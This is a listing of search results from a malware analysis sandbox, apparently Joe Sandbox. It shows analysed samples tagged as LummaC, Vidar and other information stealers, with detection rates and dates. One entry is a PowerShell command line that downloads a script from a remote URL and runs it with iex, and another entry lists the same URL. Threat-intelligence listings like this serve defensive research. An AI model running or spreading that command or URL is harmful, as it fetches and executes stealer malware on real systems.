top title background image
Malware  Trends
flash
Not found what you are looking for? Try:  Advanced Search

(limited to max. 20 search results)


Detection Sample Info Download Report Classification & Info Graph
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC, Amadey, CryptOne, LummaC Stealer
AV: 100%
file.exe
2024-09-27 04:19:08 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC, RDPWrap Tool, LummaC Stealer, Vi
AV: 54%
file.exe
2024-09-27 01:47:09 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC, RDPWrap Tool, LummaC Stealer, Vi
AV: 54%
file.exe
2024-09-27 01:36:04 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC, RDPWrap Tool, LummaC Stealer, Vi
AV: 54%
file.exe
2024-09-27 00:27:11 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC, RDPWrap Tool, LummaC Stealer, St
AV: 54%
file.exe
2024-09-27 00:14:04 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC, RDPWrap Tool, LummaC Stealer, Vi
AV: 54%
file.exe
2024-09-27 00:13:06 +02:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC, Vidar
AV: 45%
file.exe
2024-09-26 22:55:06 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC
AV: 18%
SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
2024-09-26 21:25:06 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC
AV: 8%
file.exe
2024-09-26 21:05:08 +02:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC, Vidar
AV: 34%
file.exe
2024-09-26 20:13:07 +02:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC, Stealc, Vidar
AV: 0%
file.exe
2024-09-26 19:04:07 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC
AV: None
http://google.com
2024-09-26 17:54:05 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC
AV: None
no Icon
"PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
2024-09-26 17:45:31 +02:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC
AV: None
https://finalstepgo.com/uploads/il2.txt
2024-09-26 17:40:07 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
LummaC
AV: 5%
orderconfirmation.exe
2024-09-26 16:02:05 +02:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC, Go Injector, LummaC Stealer
AV: 53%
p37SE6gM52.exe
2024-09-26 09:46:23 +02:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC
AV: 47%
3ZD5tEC5DH.exe
2024-09-26 09:46:17 +02:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC, RedLine
AV: 74%
eovQPjY5wz.exe
2024-09-26 09:46:16 +02:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC
AV: 47%
a7HdB2dU5P.exe
2024-09-26 09:46:11 +02:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC, Go Injector, LummaC Stealer
AV: 58%
iq2HxA0SLw.exe
2024-09-26 09:45:13 +02:00
Info
Class
Windows: InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files Contains malware configuration(s)
Customization Show ID column